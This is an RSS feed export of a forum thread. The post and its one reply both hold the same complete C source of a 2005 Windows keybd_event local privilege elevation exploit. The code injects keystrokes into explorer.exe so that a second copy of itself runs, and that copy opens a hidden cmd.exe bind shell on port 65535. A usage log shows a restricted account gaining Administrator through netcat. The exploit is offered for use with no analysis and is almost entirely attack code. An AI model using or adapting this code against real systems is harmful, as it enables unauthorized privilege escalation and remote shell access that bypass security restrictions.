<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[MS Windows (keybd_event) Local Privilege Elevation Exploit]]></title><description><![CDATA[<pre><code class="language-cpp">/* 
 * Microsoft Windows keybd_event validation vulnerability. 
 *          Local privilege elevation 
 * 
 * Credits:    Andres Tarasco ( aT4r _@_ haxorcitos.com ) 
 *             Iñaki Lopez    ( ilo _@_ reversing.org ) 
 * 
 * Platforms afected/tested: 
 * 
 *     - Windows 2000 
 *     - Windows XP 
 *     - Windows 2003 
 * 
 * 
 * Original Advisory: http://www.haxorcitos.com 
 *                    http://www.reversing.org  
 * 
 * Exploit Date: 08 / 06 / 2005 
 * 
 * Orignal Advisory: 
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED &quot;AS IS&quot; 
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 
 * 
 * Attack Scenario: 
 * 
 * a) An attacker who gains access to an unprivileged shell/application executed 
 * with the application runas. 
 * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP 
 * 
 * Impact: 
 * 
 * Due to an invalid keyboard input validation, its possible to send keys to any 
 * application of the Desktop. 
 * By sending some short-cut keys its possible to execute code and elevate privileges 
 * getting loggued user privileges and bypass runas/service security restriction. 
 * 
 * Exploit usage: 
 * 
 * C:\&gt;whoami 
 * AQUARIUS\Administrador 
 * 
 * C:\&gt;runas /user:restricted cmd.exe 
 * Escribir contraseña para restricted: 
 * Intentando iniciar &quot;cmd.exe&quot; como usuario &quot;AQUARIUS\restricted&quot;... 
 * 
 * 
 * Microsoft Windows 2000 [Versión 5.00.2195] 
 * (C) Copyright 1985-2000 Microsoft Corp. 
 * 
 * C:\WINNT\system32&gt;cd \ 
 * 
 * C:\&gt;whoami 
 * AQUARIUS\restricted 
 * 
 * C:\&gt;tlist.exe |find &quot;explorer.exe&quot; 
 * 1140 explorer.exe      Program Manager 
 * 
 * C:\&gt;c:\keybd.exe 1140 
 * HANDLE Found. Attacking =) 
 * 
 * C:\&gt;nc localhost 65535 
 * Microsoft Windows 2000 [Versión 5.00.2195] 
 * (C) Copyright 1985-2000 Microsoft Corp. 
 * 
 * C:\&gt;whoami 
 * whoami 
 * AQUARIUS\Administrador 
 * 
 * 
 * DONE =) 
 * 
 */ 

#include &lt;stdio.h&gt; 
#include &lt;string.h&gt; 
#include &lt;winsock2.h&gt; 
#pragma comment(lib, &quot;ws2_32.lib&quot;) 

#define HAXORCITOS 65535 
unsigned int pid = 0; 
char buf[256]=&quot;&quot;; 

/**************************************************************/ 
void ExplorerExecution (HWND hwnd, LPARAM lParam){ 
   DWORD hwndid; 
    int i; 

   GetWindowThreadProcessId(hwnd,&amp;hwndid); 

   if (hwndid == pid){ 
    /* 
      Replace keybd_event with SendMessage() and PostMessage() calls 
    */ 
        printf(&quot;HANDLE Found. Attacking =)\n&quot;); 
        SetForegroundWindow(hwnd); 
        keybd_event(VK_LWIN,1,0,0); 
        keybd_event(VkKeyScan('r'),1,0,0); 
        keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0); 
        keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0); 
        for(i=0;i&lt;strlen(buf);i++) { 
            if (buf[i]==':') { 
                keybd_event(VK_SHIFT,1,0,0); 
                keybd_event(VkKeyScan(buf[i]),1,0,0); 
                keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0); 
                keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); 
            } else { 
                if (buf[i]=='\\') { 
                    keybd_event(VK_LMENU,1,0,0); 
                    keybd_event(VK_CONTROL,1,0,0); 
                    keybd_event(VkKeyScan('º'),1,0,0); 
                    keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0); 
                    keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0); 
                    keybd_event(VkKeyScan('º'),1,KEYEVENTF_KEYUP,0); 
                } else { 
                    keybd_event(VkKeyScan(buf[i]),1,0,0); 
                    keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); 
                } 
            } 
        } 
        keybd_event(VK_RETURN,1,0,0); 
        keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0); 
        exit(1); 
    } 
} 
/**************************************************************/ 

int BindShell(void) { //Bind Shell. POrt 65535 

   SOCKET            s,s2; 
   STARTUPINFO         si; 
    PROCESS_INFORMATION pi; 
   WSADATA            HWSAdata; 
   struct            sockaddr_in sa; 
   int               len; 

   if (WSAStartup(MAKEWORD(2,2), &amp;HWSAdata) != 0) { exit(1); } 
   if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); } 

    sa.sin_family      = AF_INET; 
    sa.sin_port         = (USHORT)htons(HAXORCITOS); 
    sa.sin_addr.s_addr   = htonl(INADDR_ANY); 
    len=sizeof(sa); 
    if ( bind(s, (struct sockaddr *) &amp;sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); } 
    if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); } 
    s2 = accept(s,(struct sockaddr *)&amp;sa,&amp;len); 
    closesocket(s); 

   ZeroMemory( &amp;si, sizeof(si) );  ZeroMemory( &amp;pi, sizeof(pi) ); 
   si.cb         = sizeof(si); 
   si.wShowWindow  = SW_HIDE; 
    si.dwFlags      =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 
    si.hStdInput   = (void *) s2; // SOCKET 
    si.hStdOutput   = (void *) s2; 
    si.hStdError   = (void *) s2; 
    if (!CreateProcess( NULL ,&quot;cmd.exe&quot;,NULL, NULL,TRUE, 0,NULL,NULL,&amp;si,&amp;pi)) { 
        doFormatMessage(GetLastError()); 
        return(-1); 
    } 

    WaitForSingleObject( pi.hProcess, INFINITE ); 
   closesocket(s); 
   closesocket(s2); 
    printf(&quot;SALIMOS...\n&quot;); 
    Sleep(5000); 
    return(1); 

} 
/**************************************************************/ 
void main(int argc, char* argv[]) 
{ 
    HWND console_wnd = NULL; 

   if (argc &gt;= 2) { 
        pid = atoi (argv[1]); 
        strncpy(buf,argv[0],sizeof(buf)-1); 
       EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&amp;console_wnd)); 
    } else { 
        BindShell(); 
    } 
} 
/**************************************************************/
</code></pre>
]]></description><link>https://www.c-plusplus.net/forum/topic/123849/ms-windows-keybd_event-local-privilege-elevation-exploit</link><generator>RSS for Node</generator><lastBuildDate>Tue, 07 Jul 2026 01:12:42 GMT</lastBuildDate><atom:link href="https://www.c-plusplus.net/forum/topic/123849.rss" rel="self" type="application/rss+xml"/><pubDate>Thu, 20 Oct 2005 18:45:04 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to MS Windows (keybd_event) Local Privilege Elevation Exploit on Thu, 20 Oct 2005 18:45:04 GMT]]></title><description><![CDATA[<pre><code class="language-cpp">/* 
 * Microsoft Windows keybd_event validation vulnerability. 
 *          Local privilege elevation 
 * 
 * Credits:    Andres Tarasco ( aT4r _@_ haxorcitos.com ) 
 *             Iñaki Lopez    ( ilo _@_ reversing.org ) 
 * 
 * Platforms afected/tested: 
 * 
 *     - Windows 2000 
 *     - Windows XP 
 *     - Windows 2003 
 * 
 * 
 * Original Advisory: http://www.haxorcitos.com 
 *                    http://www.reversing.org  
 * 
 * Exploit Date: 08 / 06 / 2005 
 * 
 * Orignal Advisory: 
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED &quot;AS IS&quot; 
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 
 * 
 * Attack Scenario: 
 * 
 * a) An attacker who gains access to an unprivileged shell/application executed 
 * with the application runas. 
 * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP 
 * 
 * Impact: 
 * 
 * Due to an invalid keyboard input validation, its possible to send keys to any 
 * application of the Desktop. 
 * By sending some short-cut keys its possible to execute code and elevate privileges 
 * getting loggued user privileges and bypass runas/service security restriction. 
 * 
 * Exploit usage: 
 * 
 * C:\&gt;whoami 
 * AQUARIUS\Administrador 
 * 
 * C:\&gt;runas /user:restricted cmd.exe 
 * Escribir contraseña para restricted: 
 * Intentando iniciar &quot;cmd.exe&quot; como usuario &quot;AQUARIUS\restricted&quot;... 
 * 
 * 
 * Microsoft Windows 2000 [Versión 5.00.2195] 
 * (C) Copyright 1985-2000 Microsoft Corp. 
 * 
 * C:\WINNT\system32&gt;cd \ 
 * 
 * C:\&gt;whoami 
 * AQUARIUS\restricted 
 * 
 * C:\&gt;tlist.exe |find &quot;explorer.exe&quot; 
 * 1140 explorer.exe      Program Manager 
 * 
 * C:\&gt;c:\keybd.exe 1140 
 * HANDLE Found. Attacking =) 
 * 
 * C:\&gt;nc localhost 65535 
 * Microsoft Windows 2000 [Versión 5.00.2195] 
 * (C) Copyright 1985-2000 Microsoft Corp. 
 * 
 * C:\&gt;whoami 
 * whoami 
 * AQUARIUS\Administrador 
 * 
 * 
 * DONE =) 
 * 
 */ 

#include &lt;stdio.h&gt; 
#include &lt;string.h&gt; 
#include &lt;winsock2.h&gt; 
#pragma comment(lib, &quot;ws2_32.lib&quot;) 

#define HAXORCITOS 65535 
unsigned int pid = 0; 
char buf[256]=&quot;&quot;; 

/**************************************************************/ 
void ExplorerExecution (HWND hwnd, LPARAM lParam){ 
   DWORD hwndid; 
    int i; 

   GetWindowThreadProcessId(hwnd,&amp;hwndid); 

   if (hwndid == pid){ 
    /* 
      Replace keybd_event with SendMessage() and PostMessage() calls 
    */ 
        printf(&quot;HANDLE Found. Attacking =)\n&quot;); 
        SetForegroundWindow(hwnd); 
        keybd_event(VK_LWIN,1,0,0); 
        keybd_event(VkKeyScan('r'),1,0,0); 
        keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0); 
        keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0); 
        for(i=0;i&lt;strlen(buf);i++) { 
            if (buf[i]==':') { 
                keybd_event(VK_SHIFT,1,0,0); 
                keybd_event(VkKeyScan(buf[i]),1,0,0); 
                keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0); 
                keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); 
            } else { 
                if (buf[i]=='\\') { 
                    keybd_event(VK_LMENU,1,0,0); 
                    keybd_event(VK_CONTROL,1,0,0); 
                    keybd_event(VkKeyScan('º'),1,0,0); 
                    keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0); 
                    keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0); 
                    keybd_event(VkKeyScan('º'),1,KEYEVENTF_KEYUP,0); 
                } else { 
                    keybd_event(VkKeyScan(buf[i]),1,0,0); 
                    keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); 
                } 
            } 
        } 
        keybd_event(VK_RETURN,1,0,0); 
        keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0); 
        exit(1); 
    } 
} 
/**************************************************************/ 

int BindShell(void) { //Bind Shell. POrt 65535 

   SOCKET            s,s2; 
   STARTUPINFO         si; 
    PROCESS_INFORMATION pi; 
   WSADATA            HWSAdata; 
   struct            sockaddr_in sa; 
   int               len; 

   if (WSAStartup(MAKEWORD(2,2), &amp;HWSAdata) != 0) { exit(1); } 
   if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); } 

    sa.sin_family      = AF_INET; 
    sa.sin_port         = (USHORT)htons(HAXORCITOS); 
    sa.sin_addr.s_addr   = htonl(INADDR_ANY); 
    len=sizeof(sa); 
    if ( bind(s, (struct sockaddr *) &amp;sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); } 
    if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); } 
    s2 = accept(s,(struct sockaddr *)&amp;sa,&amp;len); 
    closesocket(s); 

   ZeroMemory( &amp;si, sizeof(si) );  ZeroMemory( &amp;pi, sizeof(pi) ); 
   si.cb         = sizeof(si); 
   si.wShowWindow  = SW_HIDE; 
    si.dwFlags      =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 
    si.hStdInput   = (void *) s2; // SOCKET 
    si.hStdOutput   = (void *) s2; 
    si.hStdError   = (void *) s2; 
    if (!CreateProcess( NULL ,&quot;cmd.exe&quot;,NULL, NULL,TRUE, 0,NULL,NULL,&amp;si,&amp;pi)) { 
        doFormatMessage(GetLastError()); 
        return(-1); 
    } 

    WaitForSingleObject( pi.hProcess, INFINITE ); 
   closesocket(s); 
   closesocket(s2); 
    printf(&quot;SALIMOS...\n&quot;); 
    Sleep(5000); 
    return(1); 

} 
/**************************************************************/ 
void main(int argc, char* argv[]) 
{ 
    HWND console_wnd = NULL; 

   if (argc &gt;= 2) { 
        pid = atoi (argv[1]); 
        strncpy(buf,argv[0],sizeof(buf)-1); 
       EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&amp;console_wnd)); 
    } else { 
        BindShell(); 
    } 
} 
/**************************************************************/
</code></pre>
]]></description><link>https://www.c-plusplus.net/forum/post/897131</link><guid isPermaLink="true">https://www.c-plusplus.net/forum/post/897131</guid><dc:creator><![CDATA[bill]]></dc:creator><pubDate>Thu, 20 Oct 2005 18:45:04 GMT</pubDate></item></channel></rss>